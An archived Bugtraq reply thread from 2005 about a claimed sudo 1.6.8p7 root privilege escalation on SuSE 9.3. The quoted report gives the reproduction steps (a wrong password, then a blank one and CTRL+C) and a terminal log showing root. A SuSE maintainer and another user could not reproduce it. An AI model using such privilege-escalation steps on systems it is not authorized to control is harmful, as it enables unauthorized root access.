Bugtraq mailing list archives
Re: [security () suse de] [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3
From: Justin <justinvinn () gmail com>
Date: Tue, 31 May 2005 15:44:45 -0400
I checked this on my RedHat Linux 9 box running sudo v 1.6.6. It didn't effect it any... On 5/31/05, Marcus Meissner <meissner () suse de> wrote:
On Tue, May 31, 2005 at 01:02:22PM +0700, Xnuxer Security wrote:Today, 31 May 2005, I found error with root privilige escalation in Sudo version 1.6.8p7 that package installed with SuSE 9.3. Testing in my machine, sudo appear not check is true when I press CTRL + C with blank password and giving status SID as root privilige to SID user. I got successful as root without need a password but only use blank password and press CTRL + C. Please check my testing below in my SuSE 9.3 box: client@mysuse:~> cat /etc/issue Welcome to SuSE Linux 9.3 (i586) - Kernel \r (\l). client@mysuse:~> id uid=1000(client) gid=100(users) groups=16(dialout),33(video),100(users) client@mysuse:~> uname -a Linux mysuse 2.6.11.4-20a-default #1 Wed Mar 23 21:52:37 UTC 2005 i686 i686 i386 GNU/Linux client@mysuse:~> sudo -V Sudo version 1.6.8p7 client@mysuse:~> sudo su Password: <---- fake password and press ENTER Sorry, try again. Password: <---- blank password and press CTRL + C mysuse:/home/client # mysuse:/home/client # uname -a; id; uptime Linux mysuse 2.6.11.4-20a-default #1 Wed Mar 23 21:52:37 UTC 2005 i686 i686 i386 GNU/Linux uid=0(root) gid=0(root) groups=0(root) 12:29pm up 2:45, 3 users, load average: 0.14, 0.29, 0.45 mysuse:/home/client # Other sudo version is not check yet, about affect in other distro of linux not check too but possible vulnerable, please check it. SuSE Security still contacted by me.I cannot reproduce this in the default installation of sudo in SUSE Linux 9.3. Did you adapt the sudo config file in some way? What exactly do you mean with "blank password" ? Empty? Or a number of spaces? Ciao, Marcus
Current thread:
- [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Xnuxer Security (May 31)
- Re: [security () suse de] [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Marcus Meissner (May 31)
- Re: [security () suse de] [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Todd C. Miller (May 31)
- Re: [security () suse de] [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Justin (May 31)
- Re: [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Ow Mun Heng (May 31)
- Re: [security () suse de] [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Marcus Meissner (May 31)